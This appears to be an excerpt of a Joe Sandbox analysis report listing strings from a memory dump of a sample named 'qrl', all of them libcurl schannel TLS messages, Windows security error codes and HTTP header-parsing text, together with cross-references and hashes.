                                                                                                                                                                                                                                                            • CALG_NO_SIGN, xrefs: 0025B3A4
                                                                                                                                                                                                                                                            • schannel: a client certificate has been requested, xrefs: 0025A685
                                                                                                                                                                                                                                                            • SSL: public key does not match pinned public key!, xrefs: 0025A5B5, 0025A70C
                                                                                                                                                                                                                                                            • Unrecognized parameter passed via CURLOPT_SSLVERSION, xrefs: 0025B0AE
                                                                                                                                                                                                                                                            • schannel: failed to receive handshake, need more data, xrefs: 0025A305
                                                                                                                                                                                                                                                            • SSL: failed retrieving public key from server certificate, xrefs: 0025A723
                                                                                                                                                                                                                                                            • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 0025A3AF
                                                                                                                                                                                                                                                            • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 0025A4CA
                                                                                                                                                                                                                                                            • schannel: disabled server certificate revocation checks, xrefs: 0025AD2E
                                                                                                                                                                                                                                                            • schannel: SNI or certificate check failed: %s, xrefs: 0025A491, 0025AF52
                                                                                                                                                                                                                                                            • CALG_MAC, xrefs: 0025B362
                                                                                                                                                                                                                                                            • CALG_AES_128, xrefs: 0025B65C
                                                                                                                                                                                                                                                            • CALG_AGREEDKEY_ANY, xrefs: 0025B4A2
                                                                                                                                                                                                                                                            • schannel: stored credential handle in session cache, xrefs: 0025B946
                                                                                                                                                                                                                                                            • CALG_CYLINK_MEK, xrefs: 0025B50A
                                                                                                                                                                                                                                                            • schannel: encrypted data got %zd, xrefs: 0025A348
                                                                                                                                                                                                                                                            • schannel: failed to setup memory allocation, xrefs: 0025AE17
                                                                                                                                                                                                                                                            • schannel: AcquireCredentialsHandle failed: %s, xrefs: 0025BC3E
                                                                                                                                                                                                                                                            • CALG_3DES_112, xrefs: 0025B3E6
                                                                                                                                                                                                                                                            • CALG_SHA, xrefs: 0025B331
                                                                                                                                                                                                                                                            • CALG_SHA_512, xrefs: 0025B6F8
                                                                                                                                                                                                                                                            • schannel: next InitializeSecurityContext failed: %s, xrefs: 0025A69A, 0025A6CC
                                                                                                                                                                                                                                                            • CALG_AES_192, xrefs: 0025B676
                                                                                                                                                                                                                                                            • :, xrefs: 0025B77E
                                                                                                                                                                                                                                                            • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 0025A8DA
                                                                                                                                                                                                                                                            • CALG_DH_SF, xrefs: 0025B46E
                                                                                                                                                                                                                                                            • schannel: failed to setup sequence detection, xrefs: 0025ADA3
                                                                                                                                                                                                                                                            • CALG_DES, xrefs: 0025B3D0
                                                                                                                                                                                                                                                            • schannel: TLS 1.3 is not yet supported, xrefs: 0025B08A
                                                                                                                                                                                                                                                            • CALG_RSA_KEYX, xrefs: 0025B3BA
                                                                                                                                                                                                                                                            • CALG_SCHANNEL_ENC_KEY, xrefs: 0025B58C
                                                                                                                                                                                                                                                            • schannel: sent initial handshake data: sent %zd bytes, xrefs: 0025AEF0
                                                                                                                                                                                                                                                            • select/poll on SSL/TLS socket, errno: %d, xrefs: 0025A7E4
                                                                                                                                                                                                                                                            • schannel: encrypted data buffer: offset %zu length %zu, xrefs: 00259F88
                                                                                                                                                                                                                                                            • CALG_SSL3_SHAMD5, xrefs: 0025B524
                                                                                                                                                                                                                                                            • CALG_DH_EPHEM, xrefs: 0025B488
                                                                                                                                                                                                                                                            • CALG_DESX, xrefs: 0025B412
                                                                                                                                                                                                                                                            • schannel: using IP address, SNI is not supported by OS., xrefs: 0025AAB9
                                                                                                                                                                                                                                                            • schannel: Failed to get certificate location for %s, xrefs: 0025BCC3
                                                                                                                                                                                                                                                            • schannel: encrypted data length: %lu, xrefs: 0025A272
                                                                                                                                                                                                                                                            • CALG_SSL2_MASTER, xrefs: 0025B5C0
                                                                                                                                                                                                                                                            • CALG_3DES, xrefs: 0025B3FC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: :$CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$SSL/TLS connection timeout$SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key!$Services$Unable to set ciphers to passed via SSL_CONN_CONFIG$Unrecognized parameter passed via CURLOPT_SSLVERSION$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate location for %s$schannel: Failed to open cert store %x %s, last error is %x$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: SSL/TLS connection with %s port %hu (step 1/3)$schannel: SSL/TLS connection with %s port %hu (step 2/3)$schannel: SSL/TLS connection with %s port %hu (step 3/3)$schannel: SSL/TLS handshake complete$schannel: TLS 1.3 is not yet supported$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: a client certificate has been requested$schannel: checking server certificate revocation$schannel: disabled server certificate revocation checks$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to receive handshake, need more data$schannel: failed to retrieve remote cert context$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle$schannel: incremented credential handle refcount = %d$schannel: initial InitializeSecurityContext failed: %s$schannel: next InitializeSecurityContext failed: %s$schannel: old credential handle is stale, removing$schannel: re-using existing credential handle$schannel: received incomplete message, need more data$schannel: sending initial handshake data: sending %lu bytes...$schannel: sending next handshake data: sending %lu bytes...$schannel: sent initial handshake data: sent %zd bytes$schannel: stored credential handle in session cache$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: unable to re-allocate memory$schannel: using IP address, SNI is not supported by OS.$schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.$select/poll on SSL/TLS socket, errno: %d
                                                                                                                                                                                                                                                            • API String ID: 0-1739913269
                                                                                                                                                                                                                                                            • Opcode ID: dd297ab942ff1bd904b09734c9a12d376992333db88953e51370cf962de7f132
                                                                                                                                                                                                                                                            • Instruction ID: c4bb471909b613a33f07fc147f5dcc6f83ca2c9a54aa03973ca530b73238baa2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd297ab942ff1bd904b09734c9a12d376992333db88953e51370cf962de7f132
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 210333706243019FDB219F11CC82B6B77E4EF84306F14056AFD499B282E7B5DD68CB6A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 0024A4AB
                                                                                                                                                                                                                                                            • SEC_E_ENCRYPT_FAILURE, xrefs: 0024A4D7
                                                                                                                                                                                                                                                            • SEC_E_NO_KERB_KEY, xrefs: 0024A5C4
                                                                                                                                                                                                                                                            • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 0024A5BD
                                                                                                                                                                                                                                                            • SEC_I_LOCAL_LOGON, xrefs: 0024A370
                                                                                                                                                                                                                                                            • SEC_E_DECRYPT_FAILURE, xrefs: 0024A4E1
                                                                                                                                                                                                                                                            • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 0024A56D
                                                                                                                                                                                                                                                            • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 0024A527
                                                                                                                                                                                                                                                            • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 0024A54F
                                                                                                                                                                                                                                                            • SEC_E_KDC_CERT_EXPIRED, xrefs: 0024A618
                                                                                                                                                                                                                                                            • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 0024A595
                                                                                                                                                                                                                                                            • SEC_E_SECPKG_NOT_FOUND, xrefs: 0024A3D4
                                                                                                                                                                                                                                                            • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 0024A384
                                                                                                                                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_C, xrefs: 0024A5E7
                                                                                                                                                                                                                                                            • SEC_E_TARGET_UNKNOWN, xrefs: 0024A3C0
                                                                                                                                                                                                                                                            • SEC_I_NO_LSA_CONTEXT, xrefs: 0024A398
                                                                                                                                                                                                                                                            • SEC_E_KDC_CERT_REVOKED, xrefs: 0024A61F
                                                                                                                                                                                                                                                            • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 0024A3B6
                                                                                                                                                                                                                                                            • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 0024A366
                                                                                                                                                                                                                                                            • SEC_E_BAD_BINDINGS, xrefs: 0024A5B3
                                                                                                                                                                                                                                                            • SEC_E_WRONG_PRINCIPAL, xrefs: 0024A488
                                                                                                                                                                                                                                                            • SEC_E_CONTEXT_EXPIRED, xrefs: 0024A460
                                                                                                                                                                                                                                                            • SEC_E_INVALID_TOKEN, xrefs: 0024A3F2
                                                                                                                                                                                                                                                            • SEC_E_CERT_EXPIRED, xrefs: 0024A4CD
                                                                                                                                                                                                                                                            • SEC_E_BUFFER_TOO_SMALL, xrefs: 0024A47E
                                                                                                                                                                                                                                                            • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 0024A5FC
                                                                                                                                                                                                                                                            • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 0024A59F
                                                                                                                                                                                                                                                            • SEC_I_CONTEXT_EXPIRED, xrefs: 0024A37A
                                                                                                                                                                                                                                                            • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 0024A545
                                                                                                                                                                                                                                                            • SEC_E_INSUFFICIENT_MEMORY, xrefs: 0024A2FC
                                                                                                                                                                                                                                                            • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 0024A4FF
                                                                                                                                                                                                                                                            • CRYPT_E_REVOKED, xrefs: 0024A324
                                                                                                                                                                                                                                                            • SEC_E_ALGORITHM_MISMATCH, xrefs: 0024A4EB
                                                                                                                                                                                                                                                            • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 0024A474
                                                                                                                                                                                                                                                            • Unknown error, xrefs: 0024A63B, 0024A645
                                                                                                                                                                                                                                                            • SEC_E_CANNOT_INSTALL, xrefs: 0024A3E8
                                                                                                                                                                                                                                                            • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 0024A58B
                                                                                                                                                                                                                                                            • SEC_E_SECURITY_QOS_FAILED, xrefs: 0024A4F5
                                                                                                                                                                                                                                                            • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 0024A424
                                                                                                                                                                                                                                                            • SEC_E_POLICY_NLTM_ONLY, xrefs: 0024A634
                                                                                                                                                                                                                                                            • SEC_E_BAD_PKGID, xrefs: 0024A456
                                                                                                                                                                                                                                                            • SEC_E_LOGON_DENIED, xrefs: 0024A41A
                                                                                                                                                                                                                                                            • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 0024A531
                                                                                                                                                                                                                                                            • SEC_E_DELEGATION_REQUIRED, xrefs: 0024A5A9
                                                                                                                                                                                                                                                            • SEC_E_NOT_OWNER, xrefs: 0024A3DE
                                                                                                                                                                                                                                                            • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 0024A603
                                                                                                                                                                                                                                                            • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 0024A5EE
                                                                                                                                                                                                                                                            • SEC_E_INVALID_PARAMETER, xrefs: 0024A626
                                                                                                                                                                                                                                                            • SEC_E_INVALID_HANDLE, xrefs: 0024A3AC
                                                                                                                                                                                                                                                            • %s (0x%08X), xrefs: 0024A646
                                                                                                                                                                                                                                                            • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 0024A51D
                                                                                                                                                                                                                                                            • SEC_E_CANNOT_PACK, xrefs: 0024A3FC
                                                                                                                                                                                                                                                            • %s - %s, xrefs: 0024A6C1
                                                                                                                                                                                                                                                            • SEC_E_MESSAGE_ALTERED, xrefs: 0024A438
                                                                                                                                                                                                                                                            • SEC_E_DELEGATION_POLICY, xrefs: 0024A62D
                                                                                                                                                                                                                                                            • SEC_E_CERT_UNKNOWN, xrefs: 0024A4C3
                                                                                                                                                                                                                                                            • SEC_E_INCOMPLETE_MESSAGE, xrefs: 0024A46A
                                                                                                                                                                                                                                                            • SEC_E_UNTRUSTED_ROOT, xrefs: 0024A49C
                                                                                                                                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 0024A5E0
                                                                                                                                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 0024A611
                                                                                                                                                                                                                                                            • SEC_E_QOP_NOT_SUPPORTED, xrefs: 0024A406
                                                                                                                                                                                                                                                            • SEC_E_NO_CREDENTIALS, xrefs: 0024A42E
                                                                                                                                                                                                                                                            • SEC_E_CERT_WRONG_USAGE, xrefs: 0024A5CB
                                                                                                                                                                                                                                                            • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 0024A563
                                                                                                                                                                                                                                                            • SEC_E_NO_IMPERSONATION, xrefs: 0024A410
                                                                                                                                                                                                                                                            • SEC_I_RENEGOTIATE, xrefs: 0024A38E
                                                                                                                                                                                                                                                            • SEC_E_MUST_BE_KDC, xrefs: 0024A53B
                                                                                                                                                                                                                                                            • SEC_I_COMPLETE_NEEDED, xrefs: 0024A35C
                                                                                                                                                                                                                                                            • SEC_E_OUT_OF_SEQUENCE, xrefs: 0024A442
                                                                                                                                                                                                                                                            • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 0024A577
                                                                                                                                                                                                                                                            • SEC_E_DOWNGRADE_DETECTED, xrefs: 0024A5D2
                                                                                                                                                                                                                                                            • SEC_E_NO_PA_DATA, xrefs: 0024A559
                                                                                                                                                                                                                                                            • SEC_E_NO_IP_ADDRESSES, xrefs: 0024A513
                                                                                                                                                                                                                                                            • SEC_I_CONTINUE_NEEDED, xrefs: 0024A31A
                                                                                                                                                                                                                                                            • SEC_E_TIME_SKEW, xrefs: 0024A492
                                                                                                                                                                                                                                                            • SEC_E_INTERNAL_ERROR, xrefs: 0024A3CA
                                                                                                                                                                                                                                                            • SEC_E_KDC_INVALID_REQUEST, xrefs: 0024A581
                                                                                                                                                                                                                                                            • SEC_E_NO_TGT_REPLY, xrefs: 0024A509
                                                                                                                                                                                                                                                            • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 0024A5F5
                                                                                                                                                                                                                                                            • SEC_I_SIGNATURE_NEEDED, xrefs: 0024A3A2
                                                                                                                                                                                                                                                            • No error, xrefs: 0024A349
                                                                                                                                                                                                                                                            • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 0024A5D9
                                                                                                                                                                                                                                                            • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 0024A44C
                                                                                                                                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 0024A60A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast_errno$strrchr$FormatMessagestrncpy
                                                                                                                                                                                                                                                            • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                                                                                                                                            • API String ID: 2057771725-3170461277
                                                                                                                                                                                                                                                            • Opcode ID: 4a35989814251b9bfa802cce732dcf6ab9d01b069a458e9a5bfa4abe1be17ce3
                                                                                                                                                                                                                                                            • Instruction ID: 71089ef4284885b6084dab52d9e7abcdc089910efb8eb996eb20c0b43fefc52b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a35989814251b9bfa802cce732dcf6ab9d01b069a458e9a5bfa4abe1be17ce3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 659103602F8266D7EF285E1848A1667665DD701700F2B8077B5069B38AD7ACDC20E7AF
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sscanf$memchrmemcpystrchrstrlen
                                                                                                                                                                                                                                                            • String ID: $ HTTP %3d$ HTTP/%1d.%1d%c%3d$ HTTP/2 %d$ RTSP/%1d.%1d%c%3d$Connection closure while negotiating auth (HTTP 1.0?)$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$Failed to alloc memory for big header!$HTTP$HTTP 1.0, assume close after body$HTTP error before end of send, keep sending$HTTP error before end of send, stop sending$HTTP/$HTTP/1.0 connection set to keep alive!$HTTP/1.0 proxy connection set to keep alive!$HTTP/1.1 proxy connection set close!$Invalid Content-Length: value$Keep sending data to get tossed away!$Last-Modified:$Location:$Lying server, not serving HTTP/2$Maximum file size exceeded$Overflow Content-Length: value!$Proxy-Connection:$Proxy-authenticate:$RTSP/$Received 101$Received HTTP/0.9 when not allowed$Rejected %zu bytes header (max is %d)!$Server:$Set-Cookie:$The requested URL returned error: %d$The requested URL returned error: %s$Transfer-Encoding:$Unsupported HTTP version in response$WWW-Authenticate:$close$keep-alive$no chunk, no close, no size. Assume close to signal end
                                                                                                                                                                                                                                                            • API String ID: 1606147131-3540691237
                                                                                                                                                                                                                                                            • Opcode ID: 2a726fe308346f5b09531168c5457297ae8176ddd5dbf0698cbe03b4d331fa70
                                                                                                                                                                                                                                                            • Instruction ID: fdf4a5c5dab578028954622f264e288acfe163ee6c90d7758d9f1d90467328fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a726fe308346f5b09531168c5457297ae8176ddd5dbf0698cbe03b4d331fa70
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C2F8706203429FDB24CF24D889BA677E4BF54304F184579EC499F386E7B5A8E4CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00266FB0: strlen.MSVCRT ref: 00267002
                                                                                                                                                                                                                                                              • Part of subcall function 00266FB0: strlen.MSVCRT ref: 00267039
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0025BE7F
                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0025BE9A
                                                                                                                                                                                                                                                              • Part of subcall function 00267140: strlen.MSVCRT ref: 0026718C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • schannel: Curl_read_plain returned CURLE_AGAIN, xrefs: 0025C03D
                                                                                                                                                                                                                                                            • schannel: server indicated shutdown in a prior call, xrefs: 0025BE0E
                                                                                                                                                                                                                                                            • schannel: renegotiation failed, xrefs: 0025C4A5
                                                                                                                                                                                                                                                            • schannel: server closed the connection, xrefs: 0025C0A5, 0025C416
                                                                                                                                                                                                                                                            • schannel: schannel_recv cleanup, xrefs: 0025BDE8, 0025BE22
                                                                                                                                                                                                                                                            • schannel: encrypted data got %zd, xrefs: 0025C060
                                                                                                                                                                                                                                                            • schannel: SSL/TLS connection renegotiated, xrefs: 0025C36E
                                                                                                                                                                                                                                                            • schannel: remote party requests renegotiation, xrefs: 0025C302
                                                                                                                                                                                                                                                            • schannel: decrypted data length: %lu, xrefs: 0025C1CF
                                                                                                                                                                                                                                                            • schannel: failed to decrypt data, need more data, xrefs: 0025C44B
                                                                                                                                                                                                                                                            • schannel: renegotiating SSL/TLS connection, xrefs: 0025C32F
                                                                                                                                                                                                                                                            • schannel: unable to re-allocate memory, xrefs: 0025C06E, 0025C4CF
                                                                                                                                                                                                                                                            • schannel: can't renogotiate, an error is pending, xrefs: 0025C490
                                                                                                                                                                                                                                                            • schannel: failed to read data from server: %s, xrefs: 0025C479
                                                                                                                                                                                                                                                            • schannel: decrypted data buffer: offset %zu length %zu, xrefs: 0025BEBE, 0025C3DF
                                                                                                                                                                                                                                                            • schannel: encdata_buffer resized %zu, xrefs: 0025BFD2
                                                                                                                                                                                                                                                            • schannel: encrypted data cached: offset %zu length %zu, xrefs: 0025C2E8
                                                                                                                                                                                                                                                            • schannel: encrypted data buffer: offset %zu length %zu, xrefs: 0025BFEE, 0025C0BE, 0025C3C6
                                                                                                                                                                                                                                                            • schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 0025C081
                                                                                                                                                                                                                                                            • schannel: client wants to read %zu bytes, xrefs: 0025BD7A
                                                                                                                                                                                                                                                            • schannel: decrypted data cached: offset %zu length %zu, xrefs: 0025C278
                                                                                                                                                                                                                                                            • schannel: encrypted data length: %lu, xrefs: 0025C2A2
                                                                                                                                                                                                                                                            • schannel: an unrecoverable error occurred in a prior call, xrefs: 0025BDC3
                                                                                                                                                                                                                                                            • schannel: decrypted data added: %zu, xrefs: 0025C25E
                                                                                                                                                                                                                                                            • schannel: can't renogotiate, encrypted data available, xrefs: 0025C49E
                                                                                                                                                                                                                                                            • schannel: enough decrypted data is already available, xrefs: 0025BDCE
                                                                                                                                                                                                                                                            • schannel: Curl_read_plain returned error %d, xrefs: 0025C089
                                                                                                                                                                                                                                                            • schannel: server closed abruptly (missing close_notify), xrefs: 0025BF83
                                                                                                                                                                                                                                                            • schannel: decrypted data returned %zu, xrefs: 0025BEA8
